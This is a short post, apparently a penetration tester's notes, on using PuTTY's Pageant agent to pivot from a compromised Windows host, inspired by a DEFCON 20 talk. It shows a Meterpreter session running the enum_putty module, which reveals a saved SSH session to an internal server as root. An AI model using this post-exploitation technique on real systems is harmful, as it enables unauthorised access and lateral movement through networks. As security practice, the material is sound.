In Egypt’s talk at DEFCON 20, he mentioned the ability to jump on a system when Pageant (PuTTY’s ssh-agent equivalent) is running. So I wanted to figure out the best way to get this going. Here is what I came up with:
meterpreter > run enum_putty
[*] Putty Installed for [["Administrator"]]
[*] Saved SSH Server Public Keys:
[*] rsa2@22:172.16.10.150
[*] Session corp_webserver:
[*] Protocol: SSH
[*] Hostname: 172.16.10.150
[*] Username: root
[*] Public Key:
meterpreter >

Awesome, this guy runs as root and we have the IP address.